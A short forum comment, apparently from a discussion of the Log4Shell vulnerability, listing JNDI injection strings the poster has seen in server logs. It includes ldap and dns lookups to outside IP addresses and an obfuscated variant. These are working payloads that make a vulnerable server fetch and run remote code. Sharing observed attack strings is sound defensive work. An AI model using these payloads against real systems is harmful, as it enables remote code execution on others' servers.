|
|
|
|
|
|
by iso1631
1646 days ago
|
|
|
Last ones I've seen jndi:dns://ip.address.scanworld.net/ref jndi:ldap://162.55.90.26/222xxxx905/C jndi:ldap://195.54.160.149:12344/Basic/Command/Base64... jndi:ldap://45.130.229.168:1389/Exploit {${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64.... Surprisingly very few attempts via http calls, and while some are on default ports, most aren't. I think most obvious attack methods will have been closed. It's the routes like "naming a rogue AP" method that will be interesting. |
|
|